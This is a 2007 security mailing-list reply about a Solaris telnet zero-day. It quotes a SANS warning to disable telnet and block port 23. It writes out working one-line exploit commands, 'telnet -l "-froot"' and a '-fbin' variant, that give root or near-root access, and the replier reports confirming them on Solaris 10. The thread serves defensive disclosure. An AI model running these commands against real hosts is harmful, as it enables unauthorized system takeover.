On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> If you run Solaris, please check if you got telnet enabled NOW. If you
> can, block port 23 at your perimeter. There is a fairly trivial Solaris
> telnet 0-day.
>> telnet -l "-froot" [hostname]
>> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
>https://isc.sans.org/contact.html
On systems where the above fails with "Not on system console", don't
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
Gadi Evron <ge at linuxbox.org> wrote:
>. If Solaris 10 & 11 are truly vulnerable to this bug,
> Sun deserves a *swift* kick to the head.
The above is from my testing with Solaris 10, so get ready to start kicking...
Kevin